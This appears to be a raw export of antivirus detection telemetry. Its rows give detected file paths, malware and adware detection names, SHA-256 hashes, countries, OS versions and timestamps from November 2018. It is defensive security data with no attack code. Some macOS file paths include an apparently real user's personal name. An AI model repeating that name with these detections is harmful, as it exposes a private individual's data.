  Row(detection=Row(filename='avscan-20181101-194420-3a056e5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194420-3A056E5B', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='i:\\users\\X\\appdata\\local\\temp\\3qdi5zelhqr\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='MG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:40:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093844-bce4c18d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093844-BCE4C18D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:38:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-230011-0ee966a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7c89dc6a\\AVSCAN-20181104-225847-FF560F6F\\AVSCAN-20181104-230011-0EE966A5', filesize=1024000, name='HEUR/AGEN.1034691.#M1.#R1'), hash='32e34bec9f0f382af7e83ae78c67f95d103f7eaaf61e24c713d0c62f263fef61', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:56:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131131-187f9d26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131131-187F9D26', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7573437\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-04T10:59:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00004a9d', filepath='C:\\Windows\\Temp\\tmp00004765\\tmp00004a9d', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='4a7798fa10e27821a6bde06bc6af15810e0041bce7070bc3b1bab6e6694d906c', metadata=Row(cmdline='-k bdx -s scan', country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T06:42:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pc_elastik.1.5.0.4.rtas.exe', filepath='G:\\Azaro vst 1\\Elastic New Banks\\Elastik\\Elastik_1.0_PC\\PC_Elastik.1.5.0.4.RTAS.exe', filesize=14336000, name='W32/Sality.AT.#M1.#R1'), hash='83c415152b39afee2ee7d2dc3d7b8887ffaa93dbd47a084a2e415e4a0b6aec9d', metadata=Row(cmdline='\\\\\\/s', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Elaborate Bytes\\VirtualCloneDrive\\VCDDaemon.exe', parentsize=85160, timestamp='2018-11-04T14:55:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151039-a1ce9944', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ed851d4\\AVSCAN-20181104-151009-9B6780A5\\AVSCAN-20181104-151039-A1CE9944', filesize=2240000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='9d4c3e45fe2bbf975aca11932710ef053d12b6df0f95050ea899931162733486', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:11:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002444c', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002444c', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:52:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-193331-7670cc41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a883537\\AVSCAN-20181103-193232-6B79D438\\AVSCAN-20181103-193331-7670CC41', filesize=1000000, name='PUA/Outbrowse.Gen.#M300.#R5615'), hash='11392c5ff4249c866c6c5174bed57a3f29bb81ef1e593dadbdaac54fd138eaa2', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:33:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-04T17:30:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T00:32:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\BetssonMPP\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\BetssonMPP\\mppoker.exe', parentsize=1289976, timestamp='2018-11-04T03:31:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T15:46:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T06:11:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:57:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002443d', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002443d', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:51:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='W32/Sality.Patched.#M1.#R1'), hash='8d162e1d1194c9e446910810e62375396f5539179acd4f123da720eb3035a74a', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3721032, timestamp='2018-11-04T23:13:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140327-f90ba8bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140327-F90BA8BD', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T20:08:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-232843-687c6cca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-232843-687C6CCA', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:28:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:32:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152950-8a9952c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-152950-8A9952C8', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:29:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001536-81827926', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001536-81827926', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:46:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d9d8', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d9d8', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:44:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-213241-e9af056c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5ab65bba\\AVSCAN-20181104-212850-D436549E\\AVSCAN-20181104-213241-E9AF056C', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:32:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='689607.exe', filepath='C:\\Program Files (x86)\\Super\\689607.exe', filesize=1024000, name='Adware/CsdiMonetize.zfkkq.#M1.#R1'), hash='3d883000c358c04415b50d9c46e276ecc714e168d2ba831cf9b61b9b0d214bfe', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bE4qSJ1uW06lwYx6.1', country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T04:27:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155022-068fd0d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be05e77\\AVSCAN-20181104-155005-031865FE\\AVSCAN-20181104-155022-068FD0D6', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='86de3d5dc1678919598aab07ecffaaeaf0e05b1b907a73d8b2d933d7fccd3095', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:50:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000853', filepath='C:\\Windows\\Temp\\tmp00000462\\tmp00000853', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:51:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205818-44bc6be4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-205818-44BC6BE4', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:58:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-175618-64a40016', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3acc0c55\\AVSCAN-20181104-175357-56B501E5\\AVSCAN-20181104-175618-64A40016', filesize=2496000, name='Adware/Wajam.deane.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:55:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135607-e9d09c1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9336ead\\AVSCAN-20181104-135523-E5B33332\\AVSCAN-20181104-135607-E9D09C1A', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:56:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:25:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='brmfcmon.exe', filepath='\\\\?\\F:\\Program Files\\Brother\\Brmfcmon\\BrMfcMon.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='32b0d34ab16a2d7df472e6d2dd1895000221fcb97e6d645cbbf34ddae7f28197', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:34:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000011ed', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp000011ed', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T15:49:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210559-97d467bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-210559-97D467BB', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:06:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:07:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-143154-4469fab9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-143154-4469FAB9', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='797bc2e1605894671f47c6ea764651c13c25d19586e546839a16308566618432', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:31:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T06:11:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='[win7.x86]easydrvmgr.exe', filepath='J:\\driver_win7\\[Win7.x86]EasyDrvmgr.exe', filesize=2624000, name='W32/Virut.Gen.#M1.#R1'), hash='c0408809eb05bdedb7955ce8d76b61415671e93165a4f44a3ee114f9e35ffe7d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHActiveDefense.exe', parentsize=965184, timestamp='2018-11-04T16:39:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220808-37be77e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-220808-37BE77E9', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:08:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205738-3d8be7c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-205738-3D8BE7C3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:57:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220100-a686b938', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-220100-A686B938', filesize=64000, name='TR/Siggen.cucmw.#M1.#R1'), hash='db6f79265933c5ec30247d757b221f8d5694e189970243bede519902113fc960', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:01:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:43:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='cc673a9e2d5f721c6f90e29ba50f18b6c61f91a3ba47f46e1c0c2ffd14947ffc', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:53:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-050230-826c12c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-045101-EF83A9A5\\AVSCAN-20181104-050230-826C12C9', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T04:02:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dự trù.exe', filepath='C:\\Users\\X\\Desktop\\khảo sát mô hình tự phòng, tự quản về ANTT\\khảo sát mô hình tự phòng, tự quản về ANTT\\Dự trù.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='b323743ddb5a68de32eebdbac0e9d9b7692e0aeaf7efe2376db7e22d86511459', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T01:42:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='1cafd3f1.exe', filepath='\\\\?\\c:\\programdata\\{b110036e-1dd4-f555-9940-6ef7780f8a22}\\1cafd3f1.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='c960e9e65998fdf3253b52896d66876a438a3908edfa6868d9df546f003c8f32', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103446-abd5c4b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-103446-ABD5C4B4', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='d12841befd786ff23785cc83cbd3e2229244e14adad9b99c0b7545886e945c07', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:36:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:03:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='abc0979552785a44816e8327eb68c6f212117cf546d6619688e764e1fe8dd91a.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\ABC0979552785A44816E8327EB68C6F212117CF546D6619688E764E1FE8DD91A.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='abc0979552785a44816e8327eb68c6f212117cf546d6619688e764e1fe8dd91a', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:45:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141623-7e5819cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43862836\\AVSCAN-20181102-141211-4F406CFD\\AVSCAN-20181102-141623-7E5819CD', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='a667a34467481b7425b4838c314748951a998afb989caa8f4954c7f6a74d010d', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:16:20Z'), dt=datetime.date(2018, 11, 2)),
